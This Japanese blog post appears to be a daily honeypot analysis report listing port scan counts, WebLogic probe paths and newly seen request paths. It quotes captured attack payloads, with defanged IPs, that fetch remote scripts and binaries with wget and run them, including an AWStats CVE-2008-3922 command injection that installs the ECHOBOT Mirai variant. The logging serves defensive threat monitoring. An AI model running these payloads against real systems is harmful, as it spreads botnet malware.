【ハニーポット簡易分析】Honeypot簡易分析(306日目:6/19)
【ハニーポット簡易分析】Honeypot簡易分析(306日目:6/19)の簡易分析となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 3188 | -707 |
23 | telnet | 768 | -830 |
5900 | vnc | 425 | -4690 |
3306 | mysql | 224 | -14 |
3389 | rdp | 212 | -111 |
2323 | telnet | 93 | -14 |
51545 | Unknown | 47 | 44 |
3400 | Unknown | 40 | 36 |
3380 | sns-channels | 39 | 24 |
3307 | opsession-prxy | 38 | -9 |
<新規マルウェアダウンロード>
新規マルウェア | attack_connection.payload.data_decrypted_2 |
---|---|
hxxp:/\/178[.]33[.]181[.]23/sh | GET /shell?cd%20/tmp;wget%20hxxp:/%5C/178[.]33[.]181[.]23/sh%20-O%20gf;%20chmod%20777%20gf;./gf HTTP/1.1 |
<ポート 7001宛の通信>
Oracle WebLogic Server の脆弱性(CVE-2019-2729)が何か来ていないか確認しましたが、特に新しい検知はありませんでした。
検知ペイロード:
POST /_async/AsyncResponseService HTTP/1.1
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
<新規検知パス一覧>
wow_path | target | CVE | reference | count |
/ | - | - | - | 27 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 25 |
hxxp://110[.]249[.]212[.]46/testget | Unauthorized Relay | - | - | 4 |
/ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 | 1 |
/robots.txt | - | - | - | 1 |
<新規検知パス一覧>
<マルウェアダウンロード>
新規パスはAWStats Totalsの脆弱性を狙ったもので、miraiの亜種であるECHOBOT をインストールさせようとする通信でした。
https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html
path |
payload | count |
/awstatstotals/awstatstotals.php | GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close.. | 1 |
新規パスはAWStats Totalsの脆弱性を狙ったもので、miraiの亜種であるECHOBOT をインストールさせようとする通信でした。
https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html